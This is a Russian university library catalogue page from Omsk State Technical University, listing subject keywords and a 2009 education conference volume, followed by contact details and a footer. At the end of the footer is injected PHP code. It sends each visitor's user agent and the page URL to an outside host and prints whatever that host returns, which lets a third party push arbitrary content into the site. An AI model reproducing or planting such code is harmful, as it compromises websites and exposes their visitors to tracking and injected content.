ВОЗДЕЙСТВИЕ -- РТУТЬ -- СБОР -- УТИЛИЗАЦИЯ -- НАНОТЕХНОЛОГИЯ -- ГРУНТ -- КАПСУЛИРОВАНИЕ -- ПРИРОДООХРАННАЯ -- ЗАДАЧА -- РУССКО-ПОЛЯНСКОЕ АТП -- ОМСКИЙ АЭРОПОРТ -- СТРОИТЕЛЬНАЯ ФИРМА "ТРЕСТ-5" -- ТРЕСТ-5 -- НЕФТЕХИМИЧЕСКОЕ -- ПРЕДПРИЯТИЕ -- ВОДОСНАБЖЕНИЕ -- НЕФТЕШЛАМ -- ЭКОЛОГИЧЕСКАЯ -- ДОКУМЕНТАЦИЯ -- ДЕТИ -- ВОСПИТАНИЕ -- ОБУЧЕНИЕ -- ОБРАЗОВАНИЕ -- СПЕЦИАЛЬНОЕ -- КОРРЕКЦИОННОЕ -- СИНДРОМ ДАУНА -- ДАУН -- СЛУХОВОЕ -- ВОСПРИЯТИЕ -- ВНИМАНИЕ -- УМСТВЕННАЯ -- ОТСТАЛОСТЬ -- РЕЧЬ -- НЕДОРАЗВИТИЕ -- РЕЧЕВАЯ -- ПАТОЛОГИЯ -- АУТИЗМ -- ДВИГАТЕЛЬНОЕ -- НАРУШЕНИЕ -- ЦЕРЕБРАЛЬНЫЙ -- ПАРАЛИЧ -- КРЕАТИВНОСТЬ -- ПОЛОВОЕ -- ВОСПИТАНИЕ -- ПЕДАГОГИКА -- МЕТОДИКА -- ПРЕПОДАВАНИЕ -- ДИСЦИПЛИНА -- МАТЕМАТИКА -- ГЕОМЕТРИЯ -- СТЕРЕОМЕТРИЯ -- ПЛАНИМЕТРИЯ -- БАКАЛАВР -- ПРОДУКЦИЯ -- КАЧЕСТВО -- ГОЛОВНОЙ -- УБОР -- ЧУЛОК -- НОСОК -- ЮВЕЛИРНОЕ -- ИЗДЕЛИЕ
Держатели документа (Информация об экземплярах) 
Полный текст
8. 
Модульно-компетентностный подход в разработке образовательного контента и обеспечении качества подготовки специалистов в условиях ИКТ-обучения : Всероссийская научно-практическая конференция Москва, 25 июня 2009 г. / ред. И. Э. Смирнова, 2009. - 340 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2997 - 24.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.09 с.20 запросов, 0.64c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;